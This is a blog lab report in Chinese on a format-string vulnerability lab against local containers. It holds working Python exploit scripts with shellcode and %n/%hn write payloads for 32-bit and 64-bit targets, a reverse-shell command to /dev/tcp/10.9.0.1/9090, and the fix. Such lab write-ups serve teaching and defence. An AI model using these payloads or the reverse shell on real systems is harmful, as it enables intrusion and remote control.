格式化字符串实验报告

Eutopia's Blog

Posted by Eutopia on December 11, 2023

Format String

1 Overview

printf函数用于根据指定格式打印出字符串,第一个参数诶格式化字符串format string,格式化字符串中使用了%来作为占位符。如果不使用%占位符而是直接将变量放入格式化字符串,则存在格式化字符串漏洞,可能被恶意利用。

2 Environment Setup

2.1 Turning of Countermeasure

关闭ASLR

sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0

2.2 The Vulnerable Program

漏洞程序如下

format.cmyprintf存在漏洞printf(msg);

void myprintf(char *msg)
{
#if __x86_64__
    unsigned long int *framep;
    // Save the rbp value into framep
    asm("movq %%rbp, %0" : "=r" (framep));
    printf("Frame Pointer (inside myprintf):      0x%.16lx\n", (unsigned long) framep);
    printf("The target variable's value (before): 0x%.16lx\n", target);
#else
    unsigned int *framep;
    // Save the ebp value into framep
    asm("movl %%ebp, %0" : "=r"(framep));
    printf("Frame Pointer (inside myprintf):      0x%.8x\n", (unsigned int) framep);
    printf("The target variable's value (before): 0x%.8x\n",   target);
#endif

    // This line has a format-string vulnerability
    printf(msg);

#if __x86_64__
    printf("The target variable's value (after):  0x%.16lx\n", target);
#else
    printf("The target variable's value (after):  0x%.8x\n",   target);
#endif

}

Compilation

cd server-code
❯ make
gcc -o server server.c
gcc -DBUF_SIZE=100 -z execstack  -static -m32 -o format-32 format.c
format.c: In function ‘myprintf’:
format.c:44:5: warning: format not a string literal and no format arguments [-Wformat-security]
   44 |     printf(msg);
      |     ^~~~~~
gcc -DBUF_SIZE=100 -z execstack  -o format-64 format.c
format.c: In function ‘myprintf’:
format.c:44:5: warning: format not a string literal and no format arguments [-Wformat-security]
   44 |     printf(msg);
      |     ^~~~~~
❯ make install
cp server ../fmt-containers
cp format-* ../fmt-containers

可以看到编译中gcc会警告存在格式化字符串漏洞

2.3 Container Setup and Commands

dcbuild
dcup

3 Task 1: Crashing the Program

首先尝试向10.9.0.5发送hello消息

image-20231211150919446

server端结果

image-20231211150812716

服务器最多接受1500字节的数据,在此任务中,需要构造payload让程序崩溃(服务器不会崩溃,因为format程序是server的子进程)

构造payload:%s,发现服务器端没有输出,程序成功crash

image-20231211151346427

image-20231211151405655

4 Task 2: Printing Out the Server Program’s Memory

继续使用10.9.0.5,令服务器打印出内存中数据

Task 2.A: Stack Data

打印栈上数据,需要知道需要多少个%.8x占位符,才能使服务器程序打印出输入的前四个字节。

构造python脚本,设定前四个字节为0xffffffff,构造100个%.8x.,令服务器端打印100个地址,查看前四个字节的位置。

image-20231211152629169

可以看到,0xffffffff位于第64个%.8x.处。

Task 2.B: Heap Data

堆上存储着一个秘密值,可以通过服务器端输出查找到,目标为打印出secret秘密值

由服务器端输出可以知道secret的地址为0x080b4008,因此将buffer的前四个字节设置为secret的地址,通过%s令服务器输出该地址的值。

构造python脚本如下:

image-20231211153657826

结果如上图,成功输出A secret message字符串

5 Task 3: Modifying the Server Program’s Memory

继续使用10.9.0.5,目标为修改0x11223344地址的值。

Task 3.A: Change the value to a different value.

更改值即可,由服务器端输出可知target地址为0x080e5068,可以通过%n修改地址的值,构造payload。

payload如下

s = "%.8x."*63 + "%n"

输出如下图,可见target成功被修改为了前面输出字符的个数(4+4+63*9)=575=0x23f

image-20231211154137419

Task 3.B: Change the value to 0x5000

0x5000-0x23f = 19905 因此需要增加19905个字符。

构造payload如下

s = "%.8x."*62 + "%.19914x" + "%n"

成功修改值为0x5000

image-20231211160234002

Task 3.C: Change the value to 0xAABBCCDD.

值比较大,因此如果使用%n会导致输出时间过长,甚至可能卡死,因此需要使用%hn%hhn一次只修改两个或一个字节。

如果使用%hn构造payload,一次只修改两字节,则需要先修改值较小的地址,然后才能修改值较高的地址。

构造前八个字节分别对应0xAABB0xCCDD的地址,并且构造payload对两个地址的值分别进行修改:0xaabb - 0x23f + 9 - 4 = 431370xccdd - 0xaabb = 8738

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

number  = 0x080e5068 # target地址(小端法,读两个字节就是0x5068)
number_1 = number + 2   # target前2个字节地址
content[0:4]  =  (number_1).to_bytes(4,byteorder='little')
content[8:12]  =  (number).to_bytes(4,byteorder='little')

# This line shows how to store a 4-byte string at offset 4
content[4:8]  =  ("abcd").encode('latin-1')


# This line shows how to construct a string s with
#   12 of "%.8x", concatenated with a "%n"
s = "%.8x"*62 + "%.43137x" + "%hn" +"%.8738x"  +"%hn"

# The line shows how to store the string s at offset 8
fmt  = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt

# Write the content to badfile
with open('badfile', 'wb') as f:
  f.write(content)

成功修改成目标值

image-20231211164056253

6 Task 4: Inject Malicious Code into the Server Program

6.1 Understanding the Stack Layout

image-20231211164407343

Question 1: What are the memory addresses at the locations marked by 2 and 3?

②是函数myprintf的返回地址,地址应为frame pointer+4 = 0xffffcfac③是buf的起始地址,可以从服务器输出直接获得:0xffffd080

Question 2: How many %x format specifiers do we need to move the format string argument pointerto 3? Remember, the argument pointer starts from the location above 1.

由上文可知,buf的前四字节需要64个%x才可以达到。

6.3 Your Task

获取server的shell。

需要修改函数myprintf的返回地址为shellcode地址,将shellcode放在buf末尾,然后使用上文的方法将shellcode地址写入返回地址即可:

#!/usr/bin/python3
import sys

# 32-bit Generic Shellcode 
shellcode_32 = (
   "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
   "/bin/bash*"
   "-c*"
   # The * in this line serves as the position marker         *
   "/bin/ls -l; echo '===== Success! ======'                  *"
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBB"   # Placeholder for argv[1] --> "-c"
   "CCCC"   # Placeholder for argv[2] --> the command string
   "DDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')


# 64-bit Generic Shellcode 
shellcode_64 = (
   "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
   "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
   "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
   "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
   "/bin/bash*"
   "-c*"
   # The * in this line serves as the position marker         *
   "/bin/ls -l; echo '===== Success! ======'                  *"
   "AAAAAAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBBBBBB"   # Placeholder for argv[1] --> "-c"
   "CCCCCCCC"   # Placeholder for argv[2] --> the command string
   "DDDDDDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')

N = 1500
# Fill the content with NOP's
content = bytearray(0x90 for i in range(N))

# Choose the shellcode version based on your target
shellcode = shellcode_32

# Put the shellcode somewhere in the payload
start = N - len(shellcode)               # Change this number
content[start:start + len(shellcode)] = shellcode

############################################################
#
#    Construct the format string here
# 
############################################################

# This line shows how to store a 4-byte integer at offset 0
shellcode_addr = 0xffffd5d4  # 0xffffd080 + start
print(hex(shellcode_addr))
number  = 0xffffcfa8 + 4
number_1 = number + 2 
content[0:4]  =  (number).to_bytes(4,byteorder='little')

content[8:12] = (number_1).to_bytes(4, byteorder='little')
# This line shows how to store a 4-byte string at offset 4
content[4:8]  =  ("abcd").encode('latin-1')

# This line shows how to construct a string s with
#   12 of "%.8x", concatenated with a "%n"
s = "%.8x."*62 + "%.54170x"  + "%hn" + "%.10795x" + "%hn"

# The line shows how to store the string s at offset 8
fmt  = (s).encode('latin-1')
content[12:12+len(fmt)] = fmt

# Save the format string to file
with open('badfile', 'wb') as f:
  f.write(content)

成功执行shellcode。

image-20231211170251532

7 Task 5: Attacking the 64-bit Server Program

攻击64位机器,服务器选择10.9.0.6.首先发送hello消息

image-20231211170653364

问题:64位机器地址前两个字符为0x00,导致printf在解析地址时遇到0x00会停止解析(与overflow中strcpy不同,strcpy会直接截断,而此处的input仍然会传入,只是printf不会解析)

可以使用$kth表示第k个参数,同时将地址放在input末尾避免此问题。

构造payload如下:

#!/usr/bin/python3
import sys

# 32-bit Generic Shellcode 
shellcode_32 = (
   "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
   "/bin/bash*"
   "-c*"
   # The * in this line serves as the position marker         *
   "/bin/ls -l; echo '===== Success! ======'                  *"
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBB"   # Placeholder for argv[1] --> "-c"
   "CCCC"   # Placeholder for argv[2] --> the command string
   "DDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')


# 64-bit Generic Shellcode 
shellcode_64 = (
   "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
   "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
   "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
   "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
   "/bin/bash*"
   "-c*"
   # The * in this line serves as the position marker         *
   "/bin/ls -l; echo '===== Success! ======'                  *"
   "AAAAAAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBBBBBB"   # Placeholder for argv[1] --> "-c"
   "CCCCCCCC"   # Placeholder for argv[2] --> the command string
   "DDDDDDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')

N = 1500
# Fill the content with NOP's
content = bytearray(0x90 for i in range(N))

# Choose the shellcode version based on your target
shellcode = shellcode_64

# Put the shellcode somewhere in the payload
start = N - len(shellcode)               # Change this number
content[start:start + len(shellcode)] = shellcode

############################################################
#
#    Construct the format string here
# 
############################################################

# This line shows how to store a 4-byte integer at offset 0
buf_addr = 0x00007fffffffe5c0
ret_addr = 0x00007fffffffe500 + 8
shellcode_addr = buf_addr + start  # 0x7fffffffeaf7
print(hex(shellcode_addr))

# target_addr for test
target_addr = 0x0000555555558010
number  = ret_addr
number1 = number + 2
number2 = number + 4
number3 = number + 6


# This line shows how to construct a string s with
#   12 of "%.8x", concatenated with a "%n"

s = "%46$.32767lx" + "%46$hn" + "%44$.27384lx" + "%44$hn" + "%45$.5384lx" + "%45$hn"

# s = "%44$lx."

# The line shows how to store the string s at offset 8
fmt  = (s).encode('latin-1')
offset = 80
content[0:len(fmt)] = fmt
content[offset:offset+8] = (number).to_bytes(8, byteorder='little')
content[offset+8:offset+16] = (number1).to_bytes(8, byteorder='little')
content[offset+16:offset+24] = (number2).to_bytes(8, byteorder='little')
# Save the format string to file
with open('badfile', 'wb') as f:
  f.write(content)

其中需要注意高位地址恒为0x0000不需要修改,其他三个都需要进行修改。

image-20231211193743193

8 Task 6: Fixing the Problem

修改如下。

    // This line has a format-string vulnerability
    printf("%s", msg);

重新编译发现警告信息消失:

image-20231211194112960

重新进行攻击,尝试打印出前100个参数,失败:

image-20231211194819158

9 Guidelines on Reverse Shell

只需修改shellcode内容即可

# 32-bit Generic Shellcode 
shellcode_32 = (
   "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
   "/bin/bash*"
   "-c*"
   # The * in this line serves as the position marker         *
   "/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1           *"
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBB"   # Placeholder for argv[1] --> "-c"
   "CCCC"   # Placeholder for argv[2] --> the command string
   "DDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')

成功获取root shell

image-20231211195911628